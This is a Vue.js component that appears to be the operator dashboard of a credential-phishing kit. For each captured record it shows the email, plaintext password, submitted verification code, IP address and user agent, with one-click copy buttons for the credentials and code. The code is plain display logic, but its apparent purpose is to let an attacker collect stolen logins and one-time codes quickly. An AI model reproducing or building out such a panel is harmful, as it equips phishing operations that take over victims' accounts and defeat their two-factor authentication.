<template>
  <div class="user-details">
    <div class="card-number">{{ index }}</div>
    <div class="detail-item">
      <span>Email:</span>
      <span>{{ user.email }}</span>
      <img src="https://i.postimg.cc/wvtSvKJG/copy.png" alt="Copy" class="copy-icon" @click="copyToClipboard(user.email)">
    </div>
    <div class="detail-item">
      <span>Password:</span>
      <span>{{ user.password }}</span>
      <img src="https://i.postimg.cc/wvtSvKJG/copy.png" alt="Copy" class="copy-icon" @click="copyToClipboard(user.password)">
    </div>
    <div class="detail-item">
      <span>Verification Code:</span>
      <span>{{ user.verificationCode || 'Not submitted' }}</span>
      <img src="https://i.postimg.cc/wvtSvKJG/copy.png" alt="Copy" class="copy-icon" @click="copyToClipboard(user.verificationCode)">
    </div>
    <div class="detail-item">
      <span>Login Time:</span>
      <span>{{ formatLoginTime(user.timestamp) }}</span>
    </div>
    <div class="detail-item">
      <span>IP Address:</span>
      <span>{{ user.ip || 'Unknown' }}</span>
    </div>
    <div class="detail-item">
      <span>User Agent:</span>
      <span>{{ user.userAgent || 'Unknown' }}</span>
    </div>
  </div>
</template>

<script>
export default {
  name: 'UserDetails',
  props: {
    user: {
      type: Object,
      required: true,
    },
    index: {
      type: Number,
      required: true,
    },
  },
  methods: {
    copyToClipboard(text) {
      navigator.clipboard.writeText(text).then(() => {
        this.$emit('copy');
      });
    },
    formatLoginTime(timestamp) {
      return new Date(timestamp).toLocaleString();
    },
  },
};
</script>

<style scoped>
.user-details {
  background-color: var(--card-background);
  border-radius: 10px;
  padding: 20px;
  box-shadow: var(--card-shadow);
  position: relative;
}

.card-number {
  position: absolute;
  top: -10px;
  right: -10px;
  background-color: var(--accent-color);
  color: var(--text-color);
  font-size: 24px;
  font-weight: bold;
  width: 40px;
  height: 40px;
  display: flex;
  justify-content: center;
  align-items: center;
  border-radius: 50%;
}

.detail-item {
  display: flex;
  align-items: center;
  margin-bottom: 15px;
}

.detail-item span:first-child {
  width: 180px;
  color: var(--secondary-color);
  font-weight: 500;
}

.detail-item span:last-child {
  flex-grow: 1;
  word-break: break-all;
}

.copy-icon {
  width: 20px;
  height: 20px;
  margin-left: 15px;
  cursor: pointer;
  opacity: 0.7;
  transition: opacity 0.3s ease;
}

.copy-icon:hover {
  opacity: 1;
}

@media (max-width: 768px) {
  .detail-item {
    flex-direction: column;
    align-items: flex-start;
  }

  .detail-item span:first-child {
    width: 100%;
    margin-bottom: 5px;
  }

  .copy-icon {
    margin-left: 0;
    margin-top: 5px;
  }
}
</style>

